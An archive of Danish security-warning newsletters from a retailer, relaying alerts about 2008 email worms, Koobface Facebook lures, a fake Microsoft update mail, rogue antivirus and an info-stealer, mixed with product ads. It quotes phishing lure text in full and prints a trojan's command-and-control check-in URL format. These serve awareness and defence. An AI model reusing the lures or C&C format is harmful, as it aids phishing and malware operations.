Hvis modtageren lokkes til at aktivere det medfølgende link og åbner filen: 'Adobe_Player10.exe', så indsamles der brugernavne, passwords og certifikater fra maskinen, som sendes til en server.
Filen Adobe_Player10.exe er et rootkit. Rootkit-driveren droppes til Windows-mappen, som "new_drv.sys" mens flere sikkerhedsrelaterede system services stoppes - herunder "Security Center" og "Windows Firewall/Internet Connection Sharing (ICS)".

Data indsamles løbende fra det inficerede system. Det inkluderer blandt andet passwords fra Microsoft Windows passwordstore, certificate store og form passwords gemt i IE cache eller som indtastes, mens denne bagdør er aktiv i hukommelsen.

Kilde: CSIS Security Group

Mvh

Gert Nielsen Fleron
 

-Julehilsen fra McDonalds, Coca-Cola og Hallmark er orm (virus).

-Årets mandelgave ?



5. december 2008

Julehilsen fra McDonalds, Coca-Cola og Hallmark er orm.

Fald ikke for mail med julehilsen med en snemand og en zip.fil. Bare slet den.

Når McDonalds sender dig en snemand og et ønske om en glædelig jul i en spammail, åbner du så den vedhæftede fil pakket i et zip-arkiv? Nej, naturligvis gør du ikke det.
Men det er der givetvis mange almindelige brugere i danske virksomheder, der kunne finde på at gøre.

Sikkerhedsfirmaet CSIS vil hermed advare om årets første jule tema spamrun, som tydeligvis er alt andet end venligt.Text

McDonalds, Coca-Cola og Hallmark

Den skadelige kode er en e-mail- og netværksorm samlet i en pakke.

Den uønskede e-mail ankommer med en af følgende emnelinjer:

Mcdonalds wishes you Merry Christmas!
Coca Cola is proud to accounce our new Christmas Promotion.
You've received A Hallmark E-Card!

Mailen er HTML-formatteret, og indholdet trækkes ned på den lokale pc fra for eksempel McDonalds officielle webside:

src/incScripts.js
src/swfobject.js
images/global_splash/arch.jpg
images/global_splash/imgoingto.jpg
images/spacer.gif

som puttes ind i den mail, der sendes til andre modtagere.

Sammen med mailen følger en vedhæftet zip-fil med filnavnene:

coupon.zip
promotion.zip
postcard.zip

Hvis denne fil pakkes ud og åbnes (den anvender et ikon af en sød snemand), så kompromitteres systemet og følsomme data lækkes til it-kriminelle, mens maskinen med det samme sender mails videre til samtlige mail-adresser, der høstes på systemet.
Som tidligere nævnt forbinder den sig til McDonalds og Coca-Cola's websider for at hente grafisk indhold og scripts til massemailingfunktionen, mens den bestemmer, hvor den inficerede maskine er fysisk placeret. Det sker ved at kontakte online servicen "whatismyip.com".

Koden indeholder adskillige tricks, der gør det svært at analysere den. Men den er en mail- og netværksorm, som går efter at stjæle informationer på din pc. Dit skrivebord bliver dækket af et juletema, når den har inficeret din maskine.

Antivirus detektion af den skadelige kode er desværre lav i skrivende stund. Men de fleste opdaterede antivirus programmer fanger fanger dem.

Kilde: CSIS Security Group



Årets mandelgave ?

Undgå at din bærbare pc bliver overophedet

Læs mere her : www.tryus.dk


Mvh

Gert Nielsen fleron

 

- Pas på jule- og nytårshilsner


30. november 2008

Det er højsæson for jule- og nytårshilsner i postkasserne. Tænk dig om, inden du åbner - der kan være virus eller onde hensigter med.

Humøret er højt i disse juletider - det samme er desværre også risikoen for, at det, der kommer ind i din indbakke, er virus eller phishing-forsøg.
Du har sikkert allerede modtaget et par julehilsner i din mailboks. De kommer ofte med vedhæftede filer i form af buttede engle med harper, julemusik eller gryntende julemænd. Men vær opmærksom og sæt dig i din mest mistænksomme stol. Der er god grund til at være på vagt, for julen er ikke kun højsæson for klejner.
Personlige kort på engelsk
Så vær forsigtig, når du modtager mails, som kommer fra personer, du ikke kender, eller hvis mailen er skrevet på et andet sprog end det, afsenderen ville skrive på. Sender din tante Lis en hilsen på engelsk til dig, er der nok noget galt.
Hvis du åbner den vedhæftede fil, kan din computer blive inficeret, og virussen eller ormen vil prøve at hente yderligere komponenter og installere dem.
Det kan starte en uhyggelig spiral, som kan efterlade maskinerne som zombier.
Så vær opmærksom og sørg for at få opdateret dit antivirus program

Phishing
Mailen kan også komme som en hilsen fra din bank eller et firma, som du kender og har tillid til. Men i virkeligheden handler det kun om at lokke dig til at give personlige oplysninger fra dig, så de kan tage penge fra dig.

Gode råd til at undgå phishing

• Klik aldrig på links i mails fra firmaer. Hvis du tror, at mailen er god nok, kan du i din browser skrive den adresse på firmaet, som du kender og er vant til at bruge.
• Tjek altid sikkerhedscertifikatet på siden, inden du giver personlig eller finansiel information fra dig på et website.
• Giv ikke personlig eller finansiel information fra dig i et popup vindue.

Kilde TDC

Mvh

Gert Nielsen Fleron

 

Hold fingrene fra en mail fra sociale netværk som Myspace og Facebook med emnet 'Your ass got filmed in the living room'.


Modtager du en mail fra en ven på et af de sociale netværk med emnet 'Your ass got filmed in the living room', skal du holde fingrene fra den. Sender du den selv, er du formentlig smittet med en Koobface/Zlob variant, som du skal have fjernet fra din pc.

Mindst en gruppe it-kriminelle misbruger en kombination af SQL-injektion og skadelig kode til at sprede skadelige links til flere sociale netværk, herunder Facebook, Myspace, HI5 og Bebo.

Your ass

Mange Facebook brugere modtager "væg-til-væg" beskeder, som det hedder på Facebook, fra personer de kender. Disse beskeder indeholder et link, som peger på en adresse, der sender de nysgerrige Facebook-brugere, der klikker på linket, videre til en fjendtlig webside. Her skal brugeren lokkes til at åbne en 'opdatering til Flash' som i virkeligheden er en Koobface/Zlob variant.

Et eksempel på disse væg-til-væg beskeder findes herunder (mellemrum indlagt i linkene):

Emne: Your ass got filmed in the living room.

"OOHHHHH
http://new.face book.com//ext//share.php?sid=357812 19074&h=hmFRU"

Klik på nedenstående link for at svare:
http://www.fa cebook.com/n/?inbox/readmessage.php&t=1074210212872

Klikker du på det pågældende link, så videredirigeres du til en webside. Det pågældende domæne indeholder endnu et script, der flytter dig til endnu et domæne/en URL.
Fra denne skadelig webside vil du blive tilbudt at installere filen 'flash_update.exe'. Men filen er en skadelig Koobface/Zlob variant.

Forskellige scripts

Selve angrebet er uhyggeligt snedigt udført ved brug af blandt andet SQL injektion.

Det pågældende script, der møder brugeren, er udformet, så det kan smitte afhængigt af hvilket netværk, brugeren kommer fra. Nogle varianter af ormen er designet til at sprede sig på Facebook, mens andre klarer Myspace og de andre sociale netværk.

Modtager du mailen, skal du lade være med at klikke på linkene og lade dig lokke videre. Kommer mailen fra dig, anbefaler vi, at du scanner din pc og tjekker, at den ikke er blevet inficeret. Det kan du gøre via vores værktøjsside.

Kilde: CSIS Security Group

PS. GODE TIPS FRA TRY US APS HANDELSFIRMA

1)

Undgå at din bærbare pc bliver overophedet

Klik her : http://www.tryus.dk/coolfeet/

2)

De simple ideer er ofte de bedste, og en "regnfrakke" der beskytter ens cd´er og dvd´er mod støv, ridser og ikke mindst uheldige børnefinger, er oplagt

Se mere her: http://www.tryus.dk/d_skin.asp

3)

Har du de rigtige priser på din net og teleforbindelse ?

Se alle tilbud her : http://www.tryus.dk/site/Sikkerhedsprodukter/ValgafBredbåndinternet/tabid/163/Default.aspx

4)

Støt Try Us

Der er flere af vores brugere, som har haft lyst til at give brød til kaffen i taknemlighed over vores hjælp, derfor har vi oprettet en konto, hvor man kan indsætte et beløb, stort eller lille.

Læs mere her:

http://www.tryus.dk/site/St%C3%B8tTryUsApS/tabid/66/Default.aspx




PROFIL AF TRY US APS

Try Us ApS er etableret i 2001 af Gert Nielsen Fleron (Mød Gert på www.facebook.com under gn@tryus.dk). Try Us ApS er et handelsfirma som står for distributionen af flere forskellige mærkevarer og har følgende afdelinger:

WWW.TRYUS.DK

Alt i sikkerheds produkter samt værktøjer til at reparere din PC med. På de fleste produkter er der dansk telefon og e.mail support.

WWW.PAINGONE.DK

Her finder du produkter som reducere og begrænser smerter. Produkter mod astma, bronkitis, næsekatar, pollenallergi, kighoste, høfeber, snorken, åndedrætsproblemer forårsaget af rygning eller snorken. Sea-Band - Afhjælp kvalme ved køresyge, søsyge, graviditet og medicin...

WWW.BRABUDDY.DK

Undgå at flashe ucharmerende BH-stropper!

Justér BH-stropperne, så de matcher dit tøjvalg – til enhver tid!

Den lille klemme Bra Buddy samler dine bh-stropper, så de passer til alle udskæringer på dine kjoler og toppe.

Try Us ApS
Larsbjørnsstræde 3, 1454 København K
Tlf.: 33377164
Fax: 33324370
Vagttelefon : 21457537

CVR.NR 26464374

Web: www.tryus.dk - www.paingone.dk - www.brabuddy.dk



 

- Med Skype er der masser af muligheder for at tale gratis fra din pc eller mobiltelefon.


21. november 2008

Vi modtager mange henvendelser på, om vi ikke kan fortælle noget omkring Skype samt hvordan man kan få det på sin PC, så derfor dette nyhedsbrev.


Med Skype er der masser af muligheder for at tale gratis fra din pc eller mobiltelefon.
• Gratis opkald til andre på Skype
• Gratis chatbeskeder
• Gratis videoopkald
• Du kan ringe gratis til andre på Skype og ringe billigt til fastnet- og mobiltelefoner
overalt i verden.

... og meget mere. For at kunne bruge Skype skal du have en computer med bredbåndsforbindelse, højttalere og en mikrofon.

Her kan du få flere informationer:

Klik på Sikkerhedsprodukter til venstre i menuen - Klik på Skype.

Når du er inde på siden så klik på et af Skype bannerne så du kommer direkte ind på deres side hvor du kan hente deres GRATIS program samt få flere informationer.

Mvh

Gert Nielsen Fleron


STØT TRY US APS.

Der er flere af vores brugere, som har haft lyst til at give brød til kaffen i taknemlighed over vores hjælp, derfor har vi oprettet en konto, hvor man kan indsætte et beløb, stort eller lille.

Læs mere her :

Klik på Støt Try Us ApS til venstre i menuen.

 

De værste, de vildeste, de mest smitsomme. Sikkerhedsfirmaet Kaspersky har kigget på efterårets vira.


Sikkerhedseksperter fra Kaspersky Lab har udarbejdet en Top 10-liste over efterårets mest ødelæggende vira på verdensplan.
Listen er fyldt med ondsindede orme, trojanere og andre former for malware, der hen over sensommeren har kostet både private og virksomheder tabte arbejdstimer, data og penge. Flere af dem nåede heldigvis ikke til Danmark.

Den grådigste trojanske bankvirus
Om det var resterne af sommervarmen, der spillede ind, skal være usagt, men topscoreren i denne kategori Trojan-Spy.Win32.Bzub.bvq var så venlig "kun" at angribe 36 banker. Kendere af kategorien vil kunne huske tilbage på bankangreb i en langt større skala.

Den grådigste trojanske virus med fokus på betalingssystemer
I samme boldgade var Backdoor.Win32.Agobot.gen så ubeskeden at gå efter fire betalingssystemer på samme tid. Ganske pænt for kategorien og en, man skal holde øje med i fremtiden. Der er krummer i knægten.

Den grådigste trojanske betalingskortvirus
September måned bød på en lettere skizofren form for vira Trojan-Banker.Win32.Banker.xkz, der udover at gå efter bankerne, også sigtede efter betalingskortene. Ikke mindre end 28 banker og fem betalingskort jagtede den.

Det mest skjulte ondsindede program
Kendere af denne kategori vil kigge langt efter medlemmer af Hupigon-familien, som plejer at løbe med al opmærksomheden. Der er imidlertid kommet en ny sheriff i byen - Backdoor.Win32.Netbus.160.e. Denne skjulte malware var pakket med hele 9 ondsindede programmer.

Det mindste ondsindede program
Fy for pyffer. Af sådan en lille fyr at være, var den da pænt irriterende. 31 bytes fyldte Trojan.BAT.MouseDisable.c, men hvilke 31 bytes. Den blokerede musen.

Det største ondsindede program
Og i det røde ringhjørne... Med 203MB tordner Trojan-Win32.Haradon.ga ind som en klar vinder på efterårets liste forklædt som en screen saver.

Den mest ondsindede kode, der udnytter svagheder på websites
Kendt fra tv2.dk og eb.dk er denne kategori et horn i siden på os alle. Den velfortjente vinder blev Exploit.Win32. PowerPlay.a, som stod for 6 procent af alle de svagheder fundet på websites, der blev brugt til at sende ondsindet kode videre til brugerne.

Mest almindelige ondsindede program på nettet
På en klar førsteplads over det mest ondsindede program på nettet finder vi Trojan-Downloader.Win32.Small.aacq, der - hold nu fast - er involveret i 20 procent af alle forsøg på at smitte brugerne.

Mest almindeligt forekommende trojanske familie
Efterårets vinder er en god, gammel kending fra Hupigon-klanen: Backdoor.Win32.Hupigon.c. Der blev konstateret 3.072 varianter af denne familie. Det er da en udholdende og omstillingsparat familie...

Mest almindeligt forekommende virus/ormefamilie
Endnu engang skal vi vende os mod september måned for at finde den mest almindelige virus/ormefamilie Worm.Win32.AutoRun. Ikke mindre end 655 nye varianter præsterede familien Orm at dukke op i.

Kilde : TDC 

LÆS ALLE UDSENDTE NYHEDER PÅ WWW.TRYUS.DK

Sender dine venner link til dig en video på Facebook, så hold snitterne fra den.

SEND GERNE DENNE INFORMATION VIDERE TIL DINE VENNER.


Endnu en variant af Koobface (en familie af Facebook orme) spreder sig i øjeblikket. Det gør den ved at poste beskeder mellem venner og derved lokke dem til at besøge en skadelig hjemmeside.

Beskeden, som ormen skyder ind, optræder med følgende indhold (links fjernet):

[%En ven%] sent you a message.

Emne: Whaat are you oding on thhis viideo?

"WOW LOL

To reply to this message, follow the link below:
http://www...

Herefter sker der en masse, og den sætter gang i download af en masse skadelig kode.

Så lad dig ikke lokke, når dine venner (tilsyneladende) sender dig et link til en sjov video med dig selv som hovedperson. Det kan blive et grimt klik med store konsekvenser for din pc.

Downloaderen fanges af de fleste antivirus-programmer.

Kilde: CSIS Security Group

STØT TRY US APS.

Der er flere af vores brugere, som har haft lyst til at give brød til kaffen i taknemlighed over vores hjælp, derfor har vi oprettet en konto, hvor man kan indsætte et beløb, stort eller lille.

Læs mere her :

http://www.tryus.dk/site/StøtTryUsApS/tabid/66/Default.aspx

PS. GODE TIPS FRA TRY US APS HANDELSFIRMA

1)

Undgå at din bærbare pc bliver overophedet

Klik her : http://www.tryus.dk/coolfeet/

2)

De simple ideer er ofte de bedste, og en "regnfrakke" der beskytter ens cd´er og dvd´er mod støv, ridser og ikke mindst uheldige børnefinger, er oplagt

Se mere her: http://www.tryus.dk/d_skin.asp

3)

Sea-Band : - Afhjælp kvalme ved køresyge, søsyge, graviditet og medicin...

Læs mere her om Sea-Band her : www.paingone.dk


PROFIL AF TRY US APS

Try Us ApS er etableret i 2001 af Gert Nielsen Fleron (Mød Gert på www.facebook.com under gn@tryus.dk). Try Us ApS er et handelsfirma som står for distributionen af flere forskellige mærkevarer og har følgende afdelinger:

WWW.TRYUS.DK

Alt i sikkerheds produkter samt værktøjer til at reparere din PC med. På de fleste produkter er der dansk telefon og e.mail support.

WWW.PAINGONE.DK

Her finder du produkter som reducere og begrænser smerter. Produkter mod astma, bronkitis, næsekatar, pollenallergi, kighoste, høfeber, snorken, åndedrætsproblemer forårsaget af rygning eller snorken. Sea-Band - Afhjælp kvalme ved køresyge, søsyge, graviditet og medicin...

WWW.BRABUDDY.DK

Undgå at flashe ucharmerende BH-stropper!

Justér BH-stropperne, så de matcher dit tøjvalg – til enhver tid!

Den lille klemme Bra Buddy samler dine bh-stropper, så de passer til alle udskæringer på dine kjoler og toppe.




Try Us ApS
Larsbjørnsstræde 3, 1454 København K
Tlf.: 33377164
Fax: 33324370
Vagttelefon : 21457537

CVR.NR 26464374

Web: www.tryus.dk - www.paingone.dk - www.brabuddy.dk
 

Skadelig kode og falske medicinalprodukter spammes ud i Obamas og McCains navn.

Sikkerhedsfirmaet CSIS har observeret endnu en spambølge, som misbruger Barrack Obama's valgsejr i USA som lokkemad til at plante skadelig kode på systemer, hvor
brugeren lokkes til at åbne en ondsindet fil.

Spammailen ankommer med et dynamisk indhold og et link til en falsk hjemmeside, der lokker med en tale af McCain. På den falske webside lokkes brugeren til at installere et plugin for at kunne se en video. Filen hedder 'AdobePlayer9.exe'. Der er naturligvis tale om skadelig kode.

De domæner der anvendes er hostet på et fast flux netværk og skifter derfor løbende IP-adresser.

Medicinalprodukter og nøgen First Lady

Der er også spammails, der lokker med 'Obama' medicinalprodukter (canadiske kopiprodukter) og nøgen billeder af Michelle Obama. Alle tricks gælder og bliver taget i brug.

Den binære fil 'AdobePlayer9.exe' er en ondsindet informationstyv, som ved kørsel ringer hjem til en C&C (Command & Control) server. Den sender oplysninger om den inficerede maskine til C&C serveren med følgende format:

cgi-bin/cmd.cgi?user_id=3664507112&version_id=5&passphrase=[dynamisk
genereret password]&socks=22002&version=125&crc=00000000
cgi-bin/options.cgi?user_id=3664507555&version_id=5&passphrase=[dynamisk
genereret password]&socks=22002&version=125&crc=00000000

Data, som det fremgår ovenfor, gør banden bag disse angreb i stand til at
fjernkontrollere systemet, der ved forbindelse med det korrekte password, spawner en root på maskinen, hvorfra der kan udstedes kommandoer.

Kilde: CSIS Security Group

Har du de rigtige priser på din net forbindelse ?

Læs mere her : http://www.tryus.dk/site/Sikkerhedsprodukter/ValgafBredbåndinternet/tabid/163/Default.aspx

 

- Pas på falsk Microsoft opdaterings-mail

- Antivirus 2010 - nyt falsk program



Pas på falsk Microsoft opdaterings-mail


Falsk mail lader som om, den kommer fra Microsoft og fortæller dig om en opdatering. I virkeligheden vil hackere overtage din pc.

Tirsdag aften sendte Microsoft sædvanen tro deres månedlige opdatering ud. Det gør de altid denne anden tirsdag i måneden og melder det ud i forvejen. Det har it-kriminelle benyttet sig af og spammet en mail ud, der foregiver at være fra Microsoft.
De håber, at uforsigtige brugere klikker på den vedhæftede fil og bliver inficeret.
Mailen
Mailen kommer fra Microsoft Update Center med afsenderadressen securityassurance@microsoft.com og har emnet Security Update for OS Microsoft Windows.
Den vedhæftede fil i mailen er efter sigende opdateringen, men i virkeligheden en farlig fil.
Teksten i mailen lyder således:
Dear Microsoft Customer,
Please notice that Microsoft company has recently issued a Security Update for OS Microsoft Windows. The update applies to the following OS versions: Microsoft Windows 98, Microsoft Windows 2000, Microsoft Windows Millenium, Microsoft Windows XP, Microsoft Windows Vista.
Please notice, that present update applies to high-priority updates category. In order to help protect your computer against security threats and performance problems, we strongly recommend you to install this update.
Since public distribution of this Update through the official website http://www.microsoft.com would have result in efficient creation of a malicious software, we made a decision to issue an experimental private version of an update for all Microsoft Windows OS users.
As your computer is set to receive notifications when new updates are available, you have received this notice.
In order to start the update, please follow the step-by-step instruction:
1. Run the file, that you have received along with this message.
2. Carefully follow all the instructions you see on the screen.
If nothing changes after you have run the file, probably in the settings of your OS you have an indication to run all the updates at a background routine. In that case, at this point the upgrade of your OS will be finished.
We apologize for any inconvenience this back order may be causing you.

Thank you,
Steve Lipner
Director of Security Assurance
Microsoft Corp.

-----BEGIN PGP SIGNATURE-----
Version: PGP 7.1
PI60XJUIBAW5WCRKETEEWZ44CFGS4HAI0O9GNPZP9RF716X1KUQ17QOL9SJ3I9K42
FJ2QG1M8FFDP4EH6LR6DAZ8YWOJ0FABX5HRYFR50N5N1VE89WL4QXA6B03VZJ1YL3
M0052D1HCW1OXGTTB5Q1KS0P1NTBH17EQALRBGSAZYK87BS9LUL3092XXJLRQZ81V
N53JLTMXYEP46ABXH9BS0G8W1HCK1U604VESLFW9GN7L9EZBLLACBOVPC8J4PZS85
2ZACU9E5PLQSP1IAKX8792711WWIYCVESXV==
-----END PGP SIGNATURE-----
Trojaner
Mailen er temmelig lang, men vi har valgt at bringe det hele, så du kan se, hvad du skal passe på.
Den siger, at de som et forsøg har vedhæftet opdateringen i mailen. Det er naturligvis ikke en opdatering, men en trojaner (Mal/EncPk-CZ), som vil overtage din pc.
Gyldne regler
Microsoft sender naturligvis aldrig opdateringer ud på denne måde. Du skal huske nogle elementære ting, når du modtager en sådan mail.
· Microsoft har ikke din mailadresse, medmindre du modtager et nyhedsbrev
· De sender ikke opdateringer i en mail
· Skal du opdatere din pc, skal du altid besøge leverandørens officielle hjemmeside eller bruge programmets officielle opdaterings-funktion
Kilde: Sophos



Antivirus 2010 - nyt falsk program

Kommer du på nogen måde i nærheden af Antivirus 2010, skal du skynde dig væk igen. Det er et nyt falsk antivirus-program.

Endnu et nyt, værdiløst, falsk sikkerhedsprodukt er kommer på markedet. Det hedder Antivirus 2010.
Selvom værktøjet er forud for sin tid, er det komplet ligeså værdiløst som alle andre værktøjer af samme skuffe. Der er tale om falske antivius-produkter, som udover at stjæle dine penge og potentielt kreditkort-oplysninger, når du betaler licens for produktet, så introducerer værktøjet også yderligere uønsket software og ustabilitet til maskinen, det installeres på.
Sagt på en anden måde: Hold dig fra 'Antivirus 2010'. Det er rogue antivirus og en afart af forgængerne 2008 og 2009.
Partner-program
Programmet forsøges installeret på maskinen igennem aggressive kampagner herunder forum og Instant Messaging spams, banner injektion med mere.
Der anvendes forskellige 'affiliate' programmer, hvor personer ude efter hurtige penge kan plante script på deres webside, indeholdende et unikt referal-ID, der giver banditten et kontant udbytte hver gang, der henvises en 'kunde' til Antivirus 2010 forretningen.
I stil med andre programmer som WinReanimator, XPSecuritycenter og IEdefender skal brugeren skræmmes til at installere programmet, og herefter lokkes til at betale en licens for at kunne fjerne virus, der ikke findes på systemet - altså, før du installerede Antivirus 2010 i hvert fald!

Kilde: CSIS Security Group










STØT TRY US APS Læs mere...

 

 

Se, hvordan du fjerner falske sikkerhedsprodukter som XP Antivirus 2008 og System Antivirus 2008.

 Læs mere...

 

Pas på Facebook-orm

Ormen forsøger at lokke dig til at hente en video, men giver dig falsk sikkerhedsprogram i stedet.

Sikkerhedsfirmaet CSIS har i weekenden opdaget en ny Facebook-orm, som spreder sig mellem andre Facebook-brugere.
Formålet med ormen er at lokke flere ud i at installere de falske sikkerheds-programmer, som florerer kraftigt for tiden.

Ormen lokker brugeren med en falsk fil - et såkaldt codec. Hvis du lader dig lokke og åbner denne fil, begynder den skadelige kode automatisk at kontakte andre Facebook-venner på dine vegne sammen med et link til den skadelige kode.
Der er således - teknisk set - tale om en orm.

Klikker du på det pågældende link, lander du på en falsk "Mytube" video-side. Billedet her til højre viser den side, du kommer ind på.
Brugeren skal lokkes til at tro, at der skal installeres en ny version af Flash-playeren for at se videoen. Hopper brugeren på det og klikker på Download-knappen, tilbydes filen "codecsetup.exe".
Denne fil dropper skadelig kode til systemet og sætter gang i ormen.

Facebook-ormens formål er tilsyneladende at tvangsfodre inficerede maskiner med falske sikkerhedsprogrammer.

Kilde: CSIS Security Group

 Læs mere...

 

 

NYHED

 

The Sanctuary fra Bluelounge. En oplader til alle dine gadgets, i en lækker indpakning.

The Sanctuary er en smuk, simpel løsning på et probelm vi alle kender til. En oplader til alle dine personlige gadgets, så de hurtigt kan findes igen, og altid fuldt opladede.

Det simple og kompakte design gemmer på en universal oplader til over 1500 eletroniske maskiner fra de fleste kendte mærker, samt en USB port til opladning af hundredevis af andre gadgets kun ved hjælp af The Sanctuary. Det er nu muligt at oplade mobiltelefoner, PDA, Blackberry, iPod, MP3 spillere, og bluetooth headsets på samme tid i en oplader.

Se video film på vores hjemmeside

http://www.tryus.dk/sanctuary/